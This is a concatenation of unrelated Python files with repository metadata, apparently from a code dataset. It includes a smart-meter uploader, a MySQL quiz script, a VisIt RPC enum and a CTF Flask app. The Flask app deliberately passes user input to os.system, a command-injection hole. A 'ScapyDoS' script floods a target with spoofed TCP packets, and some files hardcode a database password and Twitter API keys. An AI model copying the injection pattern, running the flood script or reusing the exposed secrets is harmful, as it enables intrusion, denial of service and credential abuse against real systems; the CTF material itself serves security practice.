## at Corlysis.com [1]. You need to configure your database and token
## in the config section.
##
## [1] https://corlysis.com/
##==== license section ========
## This code is under MIT License: Copyright (C) 2019 Bernd Künnen
## License details see https://choosealicense.com/licenses/mit/
##==== config section ========
# define corlysis settings here - set db and token at least
cly_base_url = 'https://corlysis.com:8086/write'
cly_parameters = {
"db": "energy",
"u" : "token",
"p" : "placeyourtokenhere",
"precision": "ms"}
# assign readable field names
config = {
"1.8.0": "Bezug",
"2.8.0": "Einspeisung",
"16.7.0": "Wirkleistung"
}
##==== code section ==== no need to change lines below ====
##-- import libraries
import json, sys, requests
import requests
import time
# load json from stdin
try:
myjson = json.load(sys.stdin)
except:
sys.stderr.write('!! error loading json')
exit(1)
# decode json
try:
line = "meter_data "
# add each meter value to line
for obis in myjson['data']:
key = config[obis] # set human readable field name
value = myjson['data'][obis] # get value from smart meter
line += key + '=' + str(value) + ',' # add key=value to insert line
# cut off last comma
line = line[:-1]
# add timestamp as unix timestamp in ms
line += ' ' + str(int(time.time()*1000)) #+ '\n'
# post data into time series database; http response should be 204
r = requests.post(cly_base_url, params=cly_parameters, data=line)
if r.status_code != 204 :
sys.stderr.write(r.status_code)
sys.stderr.write(r.content)
# catch if input is no valid json
except:
sys.stderr.write('!!error: no data block in json')
exit(2)
| 25.526316 | 71 | 0.652062 |
53df3216d619040fc2551d1e35eda4fe2e177604
| 3,868 |
py
|
Python
|
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
WifiEnigma/BattleAI/question.py
|
Puzzlebox-IMT/Puzzlebox
|
6b80e22a4aee3228140692bd6352de18b2f6a96d
|
[
"MIT"
] | null | null | null |
import mysql.connector
import random
from voice import synthetize_voice, delete_wav
def AllQuestionAI(id_theme):
i = 0
#CONNEXION A LA BDD
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
#EXECUTER LA REQUETE AVEC LA BDD
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
#RECUPERATION DES INFORMATIONS
rows = cursor.fetchall()
if rows:
for line in rows:
i += 1
enonce = line[1]
proposition1 = line[2]
proposition2 = line[3]
proposition3 = line[4]
proposition4 = line[5]
reponse = line[5]
print("*******************************************************************************")
print(" QUESTION ",i," ")
print("*******************************************************************************")
print("ENONCE : ", enonce)
print("PROPOSITION 1 : ", proposition1)
print("PROPOSITION 2 : ", proposition2)
print("PROPOSITION 3 : ", proposition3)
print("PROPOSITION 4 : ", proposition4)
print("REPONSE : ", reponse)
else:
print("Ce thème ne contient pas de questions")
def questionAI(id_theme):
i = 0
#CONNEXION A LA BDD
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
#EXECUTER LA REQUETE AVEC LA BDD
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
#RECUPERATION DES INFORMATIONS
rows = cursor.fetchall()
if rows:
nb_rows = len(rows)
num_question = random.randint(1, nb_rows)
#L'index de la liste commence à zéro, il faut donc décaler d'un le numéro
num_question = num_question - 1
question = rows[num_question]
result = [] #Tab which stores the query results
#RECUPERATION DES TUPLES
result.append(question[1])
result.append(question[2])
result.append(question[3])
result.append(question[4])
result.append(question[5])
result.append(question[5]) #This last one is the answer
print("*******************************************************************************")
print(" QUESTION ",num_question+1," ")
print("*******************************************************************************")
print("ENONCE : ", result[0])
print("PROPOSITION 1 : ", result[1])
print("PROPOSITION 2 : ", result[2])
print("PROPOSITION 3 : ", result[3])
print("PROPOSITION 4 : ", result[4])
print("REPONSE : ", result[5])
#complete_question = ''.join(complete_question) #Convert tuple into string
return result
else:
print("Ce thème ne contient pas de questions")
def tell_question(question):
synthetize_voice(question[0])
for i in range(1,5) :
num_prop = "Proposition {} ".format(i)
num_prop = ''.join(num_prop)
line = ''.join(question[i])
line = num_prop + line
synthetize_voice(line)
delete_wav()
def quiz():
counter = 1
while(counter <= 5):
questionAI(1)
if (__name__ == '__main__'):
result = questionAI(1)
tell_question(result)
| 31.447154 | 140 | 0.520941 |
54e3b8446107d9bccd2d0bc314395d7a3117387b
| 7,069 |
py
|
Python
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 226 |
2018-12-29T01:13:49.000Z
|
2022-03-30T19:16:31.000Z
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 5,100 |
2019-01-14T18:19:25.000Z
|
2022-03-31T23:08:36.000Z
|
src/resources/clients/python_client/visitstate.py
|
visit-dav/vis
|
c08bc6e538ecd7d30ddc6399ec3022b9e062127e
|
[
"BSD-3-Clause"
] | 84 |
2019-01-24T17:41:50.000Z
|
2022-03-10T10:01:46.000Z
|
import sys
class RPCType(object):
CloseRPC = 0
DetachRPC = 1
AddWindowRPC = 2
DeleteWindowRPC = 3
SetWindowLayoutRPC = 4
SetActiveWindowRPC = 5
ClearWindowRPC = 6
ClearAllWindowsRPC = 7
OpenDatabaseRPC = 8
CloseDatabaseRPC = 9
ActivateDatabaseRPC = 10
CheckForNewStatesRPC = 11
CreateDatabaseCorrelationRPC = 12
AlterDatabaseCorrelationRPC = 13
DeleteDatabaseCorrelationRPC = 14
ReOpenDatabaseRPC = 15
ReplaceDatabaseRPC = 16
OverlayDatabaseRPC = 17
OpenComputeEngineRPC = 18
CloseComputeEngineRPC = 19
AnimationSetNFramesRPC = 20
AnimationPlayRPC = 21
AnimationReversePlayRPC = 22
AnimationStopRPC = 23
TimeSliderNextStateRPC = 24
TimeSliderPreviousStateRPC = 25
SetTimeSliderStateRPC = 26
SetActiveTimeSliderRPC = 27
AddPlotRPC = 28
SetPlotFrameRangeRPC = 29
DeletePlotKeyframeRPC = 30
MovePlotKeyframeRPC = 31
DeleteActivePlotsRPC = 32
HideActivePlotsRPC = 33
DrawPlotsRPC = 34
DisableRedrawRPC = 35
RedrawRPC = 36
SetActivePlotsRPC = 37
ChangeActivePlotsVarRPC = 38
AddOperatorRPC = 39
AddInitializedOperatorRPC = 40
PromoteOperatorRPC = 41
DemoteOperatorRPC = 42
RemoveOperatorRPC = 43
RemoveLastOperatorRPC = 44
RemoveAllOperatorsRPC = 45
SaveWindowRPC = 46
SetDefaultPlotOptionsRPC = 47
SetPlotOptionsRPC = 48
SetDefaultOperatorOptionsRPC = 49
SetOperatorOptionsRPC = 50
WriteConfigFileRPC = 51
ConnectToMetaDataServerRPC = 52
IconifyAllWindowsRPC = 53
DeIconifyAllWindowsRPC = 54
ShowAllWindowsRPC = 55
HideAllWindowsRPC = 56
UpdateColorTableRPC = 57
SetAnnotationAttributesRPC = 58
SetDefaultAnnotationAttributesRPC = 59
ResetAnnotationAttributesRPC = 60
SetKeyframeAttributesRPC = 61
SetPlotSILRestrictionRPC = 62
SetViewAxisArrayRPC = 63
SetViewCurveRPC = 64
SetView2DRPC = 65
SetView3DRPC = 66
ResetPlotOptionsRPC = 67
ResetOperatorOptionsRPC = 68
SetAppearanceRPC = 69
ProcessExpressionsRPC = 70
SetLightListRPC = 71
SetDefaultLightListRPC = 72
ResetLightListRPC = 73
SetAnimationAttributesRPC = 74
SetWindowAreaRPC = 75
PrintWindowRPC = 76
ResetViewRPC = 77
RecenterViewRPC = 78
ToggleAllowPopupRPC = 79
ToggleMaintainViewModeRPC = 80
ToggleBoundingBoxModeRPC = 81
ToggleCameraViewModeRPC = 82
TogglePerspectiveViewRPC = 83
ToggleSpinModeRPC = 84
ToggleLockTimeRPC = 85
ToggleLockToolsRPC = 86
ToggleLockViewModeRPC = 87
ToggleFullFrameRPC = 88
UndoViewRPC = 89
RedoViewRPC = 90
InvertBackgroundRPC = 91
ClearPickPointsRPC = 92
SetWindowModeRPC = 93
EnableToolRPC = 94
SetToolUpdateModeRPC = 95
CopyViewToWindowRPC = 96
CopyLightingToWindowRPC = 97
CopyAnnotationsToWindowRPC = 98
CopyPlotsToWindowRPC = 99
ClearCacheRPC = 100
ClearCacheForAllEnginesRPC = 101
SetViewExtentsTypeRPC = 102
ClearRefLinesRPC = 103
SetRenderingAttributesRPC = 104
QueryRPC = 105
CloneWindowRPC = 106
SetMaterialAttributesRPC = 107
SetDefaultMaterialAttributesRPC = 108
ResetMaterialAttributesRPC = 109
SetPlotDatabaseStateRPC = 110
DeletePlotDatabaseKeyframeRPC = 111
MovePlotDatabaseKeyframeRPC = 112
ClearViewKeyframesRPC = 113
DeleteViewKeyframeRPC = 114
MoveViewKeyframeRPC = 115
SetViewKeyframeRPC = 116
OpenMDServerRPC = 117
EnableToolbarRPC = 118
HideToolbarsRPC = 119
HideToolbarsForAllWindowsRPC = 120
ShowToolbarsRPC = 121
ShowToolbarsForAllWindowsRPC = 122
SetToolbarIconSizeRPC = 123
SaveViewRPC = 124
SetGlobalLineoutAttributesRPC = 125
SetPickAttributesRPC = 126
ExportColorTableRPC = 127
ExportEntireStateRPC = 128
ImportEntireStateRPC = 129
ImportEntireStateWithDifferentSourcesRPC = 130
ResetPickAttributesRPC = 131
AddAnnotationObjectRPC = 132
HideActiveAnnotationObjectsRPC = 133
DeleteActiveAnnotationObjectsRPC = 134
RaiseActiveAnnotationObjectsRPC = 135
LowerActiveAnnotationObjectsRPC = 136
SetAnnotationObjectOptionsRPC = 137
SetDefaultAnnotationObjectListRPC = 138
ResetAnnotationObjectListRPC = 139
ResetPickLetterRPC = 140
SetDefaultPickAttributesRPC = 141
ChooseCenterOfRotationRPC = 142
SetCenterOfRotationRPC = 143
SetQueryOverTimeAttributesRPC = 144
SetDefaultQueryOverTimeAttributesRPC = 145
ResetQueryOverTimeAttributesRPC = 146
ResetLineoutColorRPC = 147
SetInteractorAttributesRPC = 148
SetDefaultInteractorAttributesRPC = 149
ResetInteractorAttributesRPC = 150
GetProcInfoRPC = 151
SendSimulationCommandRPC = 152
UpdateDBPluginInfoRPC = 153
ExportDBRPC = 154
SetTryHarderCyclesTimesRPC = 155
OpenClientRPC = 156
OpenGUIClientRPC = 157
OpenCLIClientRPC = 158
SuppressQueryOutputRPC = 159
SetQueryFloatFormatRPC = 160
SetMeshManagementAttributesRPC = 161
SetDefaultMeshManagementAttributesRPC = 162
ResetMeshManagementAttributesRPC = 163
ResizeWindowRPC = 164
MoveWindowRPC = 165
MoveAndResizeWindowRPC = 166
SetStateLoggingRPC = 167
ConstructDataBinningRPC = 168
RequestMetaDataRPC = 169
SetTreatAllDBsAsTimeVaryingRPC = 170
SetCreateMeshQualityExpressionsRPC = 171
SetCreateTimeDerivativeExpressionsRPC = 172
SetCreateVectorMagnitudeExpressionsRPC = 173
CopyActivePlotsRPC = 174
SetPlotFollowsTimeRPC = 175
TurnOffAllLocksRPC = 176
SetDefaultFileOpenOptionsRPC = 177
SetSuppressMessagesRPC = 178
ApplyNamedSelectionRPC = 179
CreateNamedSelectionRPC = 180
DeleteNamedSelectionRPC = 181
LoadNamedSelectionRPC = 182
SaveNamedSelectionRPC = 183
SetNamedSelectionAutoApplyRPC = 184
UpdateNamedSelectionRPC = 185
InitializeNamedSelectionVariablesRPC = 186
MenuQuitRPC = 187
SetPlotDescriptionRPC = 188
MovePlotOrderTowardFirstRPC = 189
MovePlotOrderTowardLastRPC = 190
SetPlotOrderToFirstRPC = 191
SetPlotOrderToLastRPC = 192
RenamePickLabelRPC = 193
GetQueryParametersRPC = 194
DDTConnectRPC = 195
DDTFocusRPC = 196
ReleaseToDDTRPC = 197
MaxRPC = 198
| 34.651961 | 54 | 0.660914 |
4ad523fc14942dd490ad41c526c6171f60967ac3
| 476 |
py
|
Python
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 15 |
2020-04-24T20:18:11.000Z
|
2022-01-31T21:05:05.000Z
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 2 |
2021-05-19T07:15:09.000Z
|
2022-03-07T08:29:34.000Z
|
Backend/models/risklayerPrognosis.py
|
dbvis-ukon/coronavis
|
f00374ac655c9d68541183d28ede6fe5536581dc
|
[
"Apache-2.0"
] | 4 |
2020-04-27T16:20:13.000Z
|
2021-02-23T10:39:42.000Z
|
from db import db
class RisklayerPrognosis(db.Model):
__tablename__ = 'risklayer_prognosis'
datenbestand = db.Column(db.TIMESTAMP, primary_key=True, nullable=False)
prognosis = db.Column(db.Float, nullable=False)
# class RisklayerPrognosisSchema(SQLAlchemyAutoSchema):
# class Meta:
# strict = True
# model = RisklayerPrognosis
#
# timestamp = fields.Timestamp(data_key="datenbestand")
# prognosis = fields.Number(data_key="prognosis")
| 28 | 76 | 0.72479 |
ab2add18b201d727e235b13fba3fa52b34c35680
| 404 |
py
|
Python
|
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
TreeModelLib/BelowgroundCompetition/__init__.py
|
jvollhueter/pyMANGA-1
|
414204a394d44405225b4b8224b19464c1006f1d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 15:25:03 2018
@author: bathmann
"""
from .BelowgroundCompetition import BelowgroundCompetition
from .SimpleTest import SimpleTest
from .FON import FON
from .OGSWithoutFeedback import OGSWithoutFeedback
from .OGSLargeScale3D import OGSLargeScale3D
from .OGS.helpers import CellInformation
from .FixedSalinity import FixedSalinity
| 25.25 | 58 | 0.799505 |
dbcc6f4ccb0dabce5252e1dd4108228b2c863f99
| 721 |
py
|
Python
|
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 2 |
2021-08-09T17:08:12.000Z
|
2021-08-09T17:08:17.000Z
|
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/web-lemonthinker/src/app/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | 1 |
2021-10-09T16:51:56.000Z
|
2021-10-09T16:51:56.000Z
|
from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301)
| 28.84 | 79 | 0.653259 |
91da549f96f9ccca48e20a796a48546be83febae
| 206 |
py
|
Python
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_03_16_01.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
nlp = spacy.load("ja_core_news_sm")
text = (
"チックフィレイはジョージア州カレッジパークに本社を置く、"
"チキンサンドを専門とするアメリカのファストフードレストランチェーンです。"
)
# トークナイズのみ行う
doc = nlp(text)
print([token.text for token in doc])
| 17.166667 | 42 | 0.73301 |
f482d9773506167246440d9307b62395f61caa1a
| 2,353 |
py
|
Python
|
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py
|
Jimmy01240397/balsn-2021-writeup
|
91b71dfbddc1c214552280b12979a82ee1c3cb7e
|
[
"MIT"
] | null | null | null |
from problem import Problem
from typing import Any, Tuple
from random import randint
import ast
import json
def gen_num():
return str(randint(1, 9))
def gen_op():
return "+-*/"[randint(0, 3)]
def gen_expr(depth):
if randint(0, depth) == 0:
l = gen_expr(depth + 1)
r = gen_expr(depth + 1)
op = gen_op()
return f"({l}{op}{r})"
return f"({gen_num()})"
class ASTMath(Problem):
@property
def name(self) -> str:
return "AST Math"
@property
def desciption(self) -> str:
return """
Input: An AST of Python's arithmetic expression (only +,-,*,/)
Output: Result number
Examples:
Input: {"body": {"left": {"value": 1, "kind": null, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 1}, "op": "<_ast.Add object at 0x7f0387ccde20>", "right": {"value": 2, "kind": null, "lineno": 1, "col_offset": 2, "end_lineno": 1, "end_col_offset": 3}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 3}}
Output: 3
Input: {"body": {"left": {"left": {"value": 8, "kind": null, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 2}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 7, "kind": null, "lineno": 1, "col_offset": 3, "end_lineno": 1, "end_col_offset": 4}, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 4}, "op": "<_ast.Sub object at 0x7f20eb76ae80>", "right": {"left": {"value": 6, "kind": null, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 8}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 3, "kind": null, "lineno": 1, "col_offset": 9, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 11}}
Output: 38
"""
@property
def rounds(self) -> int:
return 10
def dumps(self, x):
return json.dumps(
x, default=lambda x: x.__dict__ if len(x.__dict__) else str(x)
)
def generate_testcase(self) -> Tuple[bool, Any]:
l = gen_expr(1)
r = gen_expr(1)
op = gen_op()
expr = f"{l}{op}{r}"
try:
result = eval(expr)
except ZeroDivisionError:
return self.generate_testcase()
return ast.parse(expr, mode="eval"), result
| 37.349206 | 800 | 0.592435 |
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7
| 2,387 |
py
|
Python
|
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | null | null | null |
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | null | null | null |
PathPlanning/run.py
|
CandleStein/VAlg
|
43aecdd351954d316f132793cf069b70bf2e5cc2
|
[
"MIT"
] | 1 |
2020-09-25T18:31:34.000Z
|
2020-09-25T18:31:34.000Z
|
from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
if drawing == True:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
| 26.820225 | 86 | 0.607038 |
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf
| 316 |
py
|
Python
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2 |
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1
| 22.571429 | 42 | 0.550633 |
a3b8b5beaa0f8d8ecd98462fe75b978547dc1472
| 4,248 |
py
|
Python
|
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
Python X/Dictionaries in python.py
|
nirobio/puzzles
|
fda8c84d8eefd93b40594636fb9b7f0fde02b014
|
[
"MIT"
] | null | null | null |
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# dictionaries, look-up tables & key-value pairs\n",
"# d = {} OR d = dict()\n",
"# e.g. d = {\"George\": 24, \"Tom\": 32}\n",
"\n",
"d = {}\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"d[\"George\"] = 24"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"d[\"Tom\"] = 32\n",
"d[\"Jenny\"] = 16"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"{'George': 24, 'Tom': 32, 'Jenny': 16}\n"
]
}
],
"source": [
"print(d)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'Jenny' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-5-0bdfff196d23>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mprint\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0md\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mJenny\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'Jenny' is not defined"
]
}
],
"source": [
"print(d[Jenny])"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32\n"
]
}
],
"source": [
"print(d[\"Tom\"])"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"d[\"Jenny\"] = 20"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"20\n"
]
}
],
"source": [
"print(d[\"Jenny\"])"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"# keys are strings or numbers \n",
"\n",
"d[10] = 100"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"100\n"
]
}
],
"source": [
"print(d[10])"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"# how to iterate over key-value pairs"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"key:\n",
"George\n",
"value:\n",
"24\n",
"\n",
"key:\n",
"Tom\n",
"value:\n",
"32\n",
"\n",
"key:\n",
"Jenny\n",
"value:\n",
"20\n",
"\n",
"key:\n",
"10\n",
"value:\n",
"100\n",
"\n"
]
}
],
"source": [
" for key, value in d.items():\n",
" print(\"key:\")\n",
" print(key)\n",
" print(\"value:\")\n",
" print(value)\n",
" print(\"\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.88 | 354 | 0.439266 |
4367a493fbe503c8a8ff6c69a39f88b75c5407aa
| 125 |
py
|
Python
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 18 |
2019-02-14T13:10:07.000Z
|
2021-11-26T07:10:13.000Z
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-02-17T14:06:42.000Z
|
2019-09-15T18:05:54.000Z
|
kts/core/types.py
|
konodyuk/kts
|
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
|
[
"MIT"
] | 2 |
2019-09-15T13:12:42.000Z
|
2020-04-15T14:05:54.000Z
|
from typing import Union
import pandas as pd
from kts.core.frame import KTSFrame
AnyFrame = Union[pd.DataFrame, KTSFrame]
| 15.625 | 40 | 0.792 |
717864c0c5586a731d9e7b34b779d6af81159c7a
| 4,509 |
py
|
Python
|
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
slcyGeneral.py
|
mirrorcoloured/slcypi
|
c47975b3523f770d12a521c82e2dfca181e3f35b
|
[
"MIT"
] | null | null | null |
# Python 2.7.1
import RPi.GPIO as GPIO
from twython import Twython
import time
import sys
import os
import pygame
APP_KEY='zmmlyAJzMDIntLpDYmSH98gbw'
APP_SECRET='ksfSVa2hxvTQKYy4UR9tjpb57CAynMJDsygz9qOyzlH24NVwpW'
